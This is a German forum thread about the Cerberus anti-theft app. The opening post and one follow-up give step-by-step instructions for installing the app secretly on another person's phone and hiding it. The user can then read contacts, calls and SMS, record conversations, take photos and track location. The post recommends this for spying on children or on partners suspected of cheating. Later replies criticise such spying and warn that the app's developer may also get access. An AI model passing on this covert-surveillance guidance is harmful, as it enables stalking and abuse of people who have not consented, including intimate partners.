Cerberus Anti - Diebsthal APP

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Cerberus Anti - Diebsthal APP

      Hallo Pumperszene,

      ich habe seit längerem eine tolle APP auf meinem Telefon welches sich Cerberus Anti - Diebsthal APP nennt. Allerdings muss ich hinzufügen das es sich hierbei nicht nur um eine reine Diebstahl APP handelt sondern man hat mit dieser APP noch einen gewissen Spielraum.


      Beschreibung:

      Zugang zu der Kontakt Liste, Ruf Liste, SMS Liste, 300 sek. Aufnahme ist möglich (bedeutet wenn das Telefon zufällig auf dem Tisch liegt wie so oft kann man das Gespräch 300 sek. verfolgen), Fotos schießen mit der Front und Rück Kamera sowohl als auch mit Blitz oder ohne, man kann das Telefon ausschalten und anschalten, der installierten Person kann man aus heiterem Himmel eine Nachricht senden die mitten auf dem Bildschirm erscheint und wieder verpufft mit einen Alarm Ton ím hintergrund oder sogar dierekt von dem Telefon eine SMS versenden usw, usw.

      Dazu muss man nur die unten angegebene APP auf das Telefon der gewählten Person instalieren (dauer ca. mit W Lan 20 sek.) und dann hat man einen kompletten Zugriff auf das Telefon.

      Vorgang: Installiert den unten genanten Link auf euer Telefon und auf das der gewünschten Person.

      play.google.com/store/apps/det…om.lsdroid.cerberus&hl=de

      Wenn ihr das getan habt installiert den zweiten Link allerings nur auf euer Telefon.

      apk4fun.com/apk/7589/

      Mit dem zweiten Link habt ihr dann die Möglichkeit ins Telefon eurer gewünschten Person zu gehen. Ihr solltet als erstes die APP unsichtbar schalten damit sie nicht für die gewählte Person zu sehen ist. Und alles weitere liegt in eurer Hand.


      Um eines noch klar zu stellen: Ich empfehle diese APP eher Eltern die somit mehr ihre Kids auf dem Schirm haben (heut zu tage kann man nicht vorsichtig gennug sein). Aber auch eventuell Menschen die das Gefühl haben betrogen zu werden.

      LG
      Handel wie du willst, aber denke an die Konsequenzen!
    • gurrel schrieb:

      wird sie denn als app auf dem telefon angezeit oder ist sie "versteckt"?

      Auf dem installierten Telefon was ausspioniert werden soll wird die APP nicht angezeigt. Allerdings musst du dazu mit der zweiten APP welche nur auf deinem Telefon installiert wird das Einstellen (Easy).

      Des Weiteren kannst du den genauen Standort ermitteln.
      Handel wie du willst, aber denke an die Konsequenzen!
    • Just4U schrieb:

      Ist doch schon wie eine Abhör-App. Ein Wunder, dass die kostenlos ist...?

      Nein das ist kein Wunder, denn nicht nur du hast damit uneingeschränkten Zugriff auf das Handy, sondern auch der App-Programmierer.

      Du bezahlst also mit deiner Privatsphäre (oder der deines Opfers) für die App, wirst warscheinlich Teil eines Bot-Netzes oder für sonst irgendwelche Machenschaften mißbraucht.

      Ausserdem halte ich überhaupt nichts davon, den eigenen Bekanntenkreis zu bespitzeln.
      Ich hatte mal einen guten "Freund", der im betrunkenen Zustand oft über andere Leute her zog und dabei teilweise sehr persönliche Details rausgehauen hat.
      Als er dann mal seinen USB-Stick voller Viren und Trojaner in meinem Rechner vergessen hat war klar, woher er das alles wusste.

      Solche Typen sind der letzte Dreck und mindestens genau so erbärmlich und hinterhältig ist auch das Spionieren in einer Partnerschaft.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Armstrong ()

    • Armstrong schrieb:

      Just4U schrieb:

      Ist doch schon wie eine Abhör-App. Ein Wunder, dass die kostenlos ist...?
      Nein das ist kein Wunder, denn nicht nur du hast damit uneingeschränkten Zugriff auf das Handy, sondern auch der App-Programmierer.

      Du bezahlst also mit deiner Privatsphäre (oder der deines Opfers) für die App, wirst warscheinlich Teil eines Bot-Netzes oder für sonst irgendwelche Machenschaften mißbraucht.

      Ausserdem halte ich überhaupt nichts davon, den eigenen Bekanntenkreis zu bespitzeln.
      Ich hatte mal einen guten "Freund", der im betrunkenen Zustand oft über andere Leute her zog und dabei teilweise sehr persönliche Details rausgehauen hat.
      Als er dann mal seinen USB-Stick voller Viren und Trojaner in meinem Rechner vergessen hat war klar, woher er das alles wusste.

      Solche Typen sind der letzte Dreck und mindestens genau so erbärmlich und hinterhältig ist auch das Spionieren in einer Partnerschaft.
      Da mus ich dir recht geben die Privatsphäre ist ein hohes gut und sollte Respektiert werden. Die meisten die es nötig haben so etwas zu machen möchten aber selbst nicht das es bei Ihnen angewandt wird.
    • Greyhound schrieb:

      Ich hasse es wenn jemand in mein Handy reinschaut das ist absoluter Vertrauensbruch!
      Lg Grey
      Ich denke das ist jeder ein Stück weit anders gewindet. Mir hats damals bei meiner ex überhaupt nichts ausgemacht. Solange man nicht komplett austickt nur weil man mit einer Freundin ab und zu schreibt.
    • ne ortungsapp hat meine Tochter auch aufm handy, zur Sicherheit.... Allerdings keine abhörapp mehr. Hab nachdem sie 1x mist gebaut hatte, so ne app bei ihr drauf gemacht. Mit ihrem wissen. Haben aber irgendwann beschlossen, das ding wieder runter zu schmeissen. Unter gewissen Umständen mag sowas angebracht sein, aber allgemein halte ich davon auch nicht mehr so viel.
      Ich mag Einhörner
    • tattoo-freak schrieb:

      ne ortungsapp hat meine Tochter auch aufm handy, zur Sicherheit.... Allerdings keine abhörapp mehr. Hab nachdem sie 1x mist gebaut hatte, so ne app bei ihr drauf gemacht. Mit ihrem wissen. Haben aber irgendwann beschlossen, das ding wieder runter zu schmeissen. Unter gewissen Umständen mag sowas angebracht sein, aber allgemein halte ich davon auch nicht mehr so viel.
      wärst du mein Vater würd ich dir das ding an den Kopf ballern haha
    • Wer mit dem Gedanken spielt, diese App zu benutzen sollte, trotz aller Vorfreude auf seine lächerliche Spannerei, auch mal darüber nachdenken was er sich da aufs Handy holt.

      Eine App, die zu quasi ALLEM berechtigt ist.

      Wer steht dahinter?
      Oho, ein anonymer Programmierer aus den USA.

      Wer würde einem völlig unbekanntem von der Strasse die Rechte einräumen auf alle Handyinhalte zuzugreifen und nach belieben Kamera und Mikrofon zu benutzen?
      Wohl niemand.
      Wenn er sich hinter einer App versteckt scheint das jedoch für die meisten völlig OK zu sein.


      Hinter solchen Apps kann praktisch jeder stecken, von professionellen Hackern über NSA bis hin zu irgendwelchen perversen Spannern oder Pornoseitenbetreibern.
      So wird aus dem vermeintlichen Beobachter schnell der Beobachtete.

      Auch wenn man die App nur dazu benutzen will, ein gestohlenes Handy zu orten:
      Ich persönlich würde mich eher mit dem Verlust meines Handys abfinden als mir sowas zu installieren.

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Armstrong ()

    • Genetik schrieb:

      tattoo-freak schrieb:

      ne ortungsapp hat meine Tochter auch aufm handy, zur Sicherheit.... Allerdings keine abhörapp mehr. Hab nachdem sie 1x mist gebaut hatte, so ne app bei ihr drauf gemacht. Mit ihrem wissen. Haben aber irgendwann beschlossen, das ding wieder runter zu schmeissen. Unter gewissen Umständen mag sowas angebracht sein, aber allgemein halte ich davon auch nicht mehr so viel.
      wärst du mein Vater würd ich dir das ding an den Kopf ballern haha
      wäre ich dein vater, hätte ich sowieso schiss das drauf zu machen... ich weiß schließlich wie du aussiehst :whistling:
      Ich mag Einhörner
    • tattoo-freak schrieb:

      Genetik schrieb:

      tattoo-freak schrieb:

      ne ortungsapp hat meine Tochter auch aufm handy, zur Sicherheit.... Allerdings keine abhörapp mehr. Hab nachdem sie 1x mist gebaut hatte, so ne app bei ihr drauf gemacht. Mit ihrem wissen. Haben aber irgendwann beschlossen, das ding wieder runter zu schmeissen. Unter gewissen Umständen mag sowas angebracht sein, aber allgemein halte ich davon auch nicht mehr so viel.
      wärst du mein Vater würd ich dir das ding an den Kopf ballern haha
      wäre ich dein vater, hätte ich sowieso schiss das drauf zu machen... ich weiß schließlich wie du aussiehst :whistling:
      man sollte kindern schon ihren greiraum lassen jeder hat mal scheiße gemacht wo er jung war und aus euch ist ja auch was geworden .. aber generell muss man schon sagen in der heutigen zeit hätte ich echt nicht gerne eine Tochter ..
    • Wie gesagt isses gps nicht zum ausspionieren, sondern aus Sicherheitsgründen drauf. Sollte man grade bei hübschen mädels bzw kids, die wie meine auch mit roller unterwegs sind, schon machen. Is ne reine ortungsapp.
      Den anderen kram hab ich runtergeschmissen, weil die "kleine" bewiesen hat dasses n einmaliger ausrutscher war und ich ihr vertrauen kann :love:
      Ich mag Einhörner
    • was hat sie denn gemacht :D


      Shop-Ulab und Apoanfragen wandern in den Papierkorb!
      ALLE Bewertungen- von diesem Account getätigt- sind anonyme Bewertungen von Usern und spiegeln in KEINSTERWEISE meine Erfahrungen wieder!
      Auch sind Bewertungen in der "ICH"-Form nicht mit mir in Verbindung zu bringen.


      Die gesamte Forenleitung distanziert sich von der Beschaffung leistungssteigernden Substanzen